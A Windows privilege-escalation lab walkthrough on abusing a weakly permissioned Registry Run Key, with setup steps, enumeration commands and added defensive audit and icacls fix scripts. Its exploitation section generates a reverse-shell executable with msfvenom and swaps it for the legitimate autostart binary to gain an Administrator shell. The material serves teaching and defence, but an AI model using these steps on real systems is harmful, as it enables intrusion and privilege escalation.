Logon Autostart Execution through Registry Run Keys is a Windows feature that launches the programs or scripts listed under the Run keys automatically whenever a user logs on, with no manual action required from that user.
Attackers can abuse this feature by placing malicious software where a Registry Run Key expects a program to be. The malicious code is then launched automatically at every logon, and because the HKLM Run keys apply to every user who signs in, it runs in the security context of whoever logs on next, including an Administrator.
- Open a PowerShell with local Administrator privileges and run the following command to create a new folder:
mkdir "C:\Program Files\NickvourdSrv"
Outcome:
- Download the file NCV_AMD64.exe to the 'C:\Program Files\NickvourdSrv' directory.
- Modify the permissions of the 'C:\Program Files\NickvourdSrv' directory to allow Full Control for all users:
- Open a PowerShell with local Administrator privileges and run the following command to open the Registry Editor:
regedit
- Navigate to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run and create a new String Value named NickvourdSrv:
- Modify the string value named NickvourdSrv so that its value data is C:\Program Files\NickvourdSrv\NCV_AMD64.exe:
To set up the lab with the 'Logon Autostart Execution (Registry Run Keys)' scenario use the custom PowerShell script named LogonAutostartExecutionRegistryRunKeys.ps1.
Open a PowerShell with local Administrator privileges and run the script:
.\LogonAutostartExecutionRegistryRunKeys.ps1
Outcome:
To perform manual enumeration and identify whether a Windows workstation is vulnerable to the RegistryAutoruns issue, you can use the following command from a command prompt:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Outcome:
To run the SharpUp tool and perform an enumeration of the RegistryAutoruns vulnerability, you can execute the following command with the appropriate arguments:
SharpUp.exe audit RegistryAutoruns
Outcome:
ℹ️ Moreover, you can run SharpUp.exe audit without a check name to perform a comprehensive enumeration of all misconfiguration vulnerabilities on the machine.
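As an added defensive example (this is not part of the original lab and not SharpUp's code), the PowerShell script below performs the RegistryAutoruns check by hand: it reads the Run/RunOnce keys, extracts the executable path from each value (quoted or unquoted, with or without arguments), and reports any autostart binary whose file or parent folder grants write-class rights to Everyone, Users, Authenticated Users or INTERACTIVE. The list of registry paths and "weak" principals is my choice, and it assumes an elevated PowerShell so that every ACL can be read.

```powershell
# Added example, not part of the original lab: audit the Run/RunOnce keys and flag
# autostart executables whose file or parent folder can be modified by
# low-privileged principals. Run from an elevated PowerShell.

$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
)

# Principals that should never be able to write to an autostart binary or its folder
# (chosen for this example; extend to match your environment).
$weakPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these bits in an Allow ACE lets the principal replace the file.
$writeMask = [int][System.Security.AccessControl.FileSystemRights]::Write -bor
             [int][System.Security.AccessControl.FileSystemRights]::Modify -bor
             [int][System.Security.AccessControl.FileSystemRights]::FullControl -bor
             0x40000000 -bor 0x10000000   # GENERIC_WRITE | GENERIC_ALL as seen in raw ACEs

function Resolve-CommandPath {
    # Extract the executable path from a Run value such as
    #   "C:\Program Files\Foo\foo.exe" /arg   or   C:\Program Files\Foo\foo.exe
    param([string]$CommandLine)
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ([string]::IsNullOrWhiteSpace($cmd)) { return $null }
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        if ($end -gt 0) { return $cmd.Substring(1, $end - 1) }
    }
    # Unquoted path that may contain spaces: grow the prefix until it names a file.
    $parts = $cmd -split ' '
    for ($i = 1; $i -le $parts.Count; $i++) {
        $candidate = $parts[0..($i - 1)] -join ' '
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    }
    return $cmd
}

function Get-WeakAce {
    # Return the Allow ACEs on $Path that grant write-class rights to a weak principal.
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($weakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $writeMask) -ne 0) { $ace }
    }
}

$findings = foreach ($key in $runKeys) {
    if (-not (Test-Path -Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($name in $props.PSObject.Properties.Name) {
        # Skip the provider metadata that Get-ItemProperty adds to every result.
        if ($name -in 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider') { continue }
        $exe = Resolve-CommandPath $props.$name
        if ([string]::IsNullOrWhiteSpace($exe) -or -not (Test-Path -LiteralPath $exe -PathType Leaf)) { continue }
        # Check the binary itself and the folder it lives in: a writable folder is enough
        # to rename the original and drop a replacement with the same name.
        foreach ($target in @($exe, (Split-Path -Parent $exe))) {
            foreach ($ace in Get-WeakAce -Path $target) {
                [pscustomobject]@{
                    Key       = $key
                    Value     = $name
                    Target    = $target
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                }
            }
        }
    }
}

if ($findings) { $findings | Format-Table -AutoSize }
else { 'No weakly permissioned autostart executables found.' }
```

On the lab machine set up above, the script reports the NickvourdSrv value with 'C:\Program Files\NickvourdSrv' as the target and Everyone (or BUILTIN\Users, depending on how Full Control was granted) as the principal; on a correctly permissioned host it prints nothing but the final message.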
- Use msfvenom to generate a malicious executable (exe) file that can be executed via the booting of the victim's machine:
msfvenom -p windows/x64/shell_reverse_tcp lhost=eth0 lport=1234 -f exe > shell.exe
- Transfer the malicious executable file to the victim's machine.
- Move the malicious executable file to 'C:\Program Files\NickvourdSrv'.
- Rename the 'NCV_AMD64.exe' to 'NCV_AMD64.bak'.
- Rename the malicious exe (shell.exe) to 'NCV_AMD64.exe'.
Outcome:
- Open a listener on your Kali machine.
- Reboot the victim's machine and log in as Administrator:
- Verify the reverse shell on your Kali machine:
To defend against Registry auto-run vulnerabilities, restrict the permissions on folders containing executables launched through this mechanism so that unprivileged users cannot modify or replace them.
Moreover, to delete a specific auto-run key value from the Windows Registry, you can use the following command in Command Prompt with local Administrator privileges:
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "<KeyName>" /f
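As an added example of the permission fix described above (not part of the original lab), the PowerShell below uses icacls to replace the world-writable ACL on the lab's autostart folder with a minimal one: SYSTEM and Administrators keep Full Control, Users get read and execute only, and any explicit grant to Everyone is removed from the folder and its files. The folder path is the lab's own; on a real system substitute the folder reported by your audit.

```powershell
# Added example, not part of the original lab: restore a restrictive ACL on the
# autostart folder so only SYSTEM and Administrators can change its contents.
# Run from an elevated PowerShell. $dir is the lab's folder; adjust as needed.
$dir = 'C:\Program Files\NickvourdSrv'

# Drop inherited ACEs so the folder no longer picks up permissive entries from its parent.
icacls $dir /inheritance:r

# Set an explicit, minimal DACL; (OI)(CI) makes each entry inherit to files and subfolders.
# /grant:r replaces any previous explicit grant for the same principal.
icacls $dir /grant:r 'NT AUTHORITY\SYSTEM:(OI)(CI)F' 'BUILTIN\Administrators:(OI)(CI)F' 'BUILTIN\Users:(OI)(CI)RX'

# Remove any explicit grant to Everyone left on the folder or its files (/T recurses,
# /C continues past errors).
icacls $dir /remove:g Everyone /T /C

# Verify: list the resulting ACL and confirm no write-class ACE remains for Everyone.
icacls $dir
(Get-Acl -LiteralPath $dir).Access |
    Where-Object { $_.IdentityReference -eq 'Everyone' -and $_.AccessControlType -eq 'Allow' }
```

After this change the rename-and-replace step in the exploitation walkthrough fails for a standard user, while the legitimate NCV_AMD64.exe still launches at logon because Users retain read and execute rights.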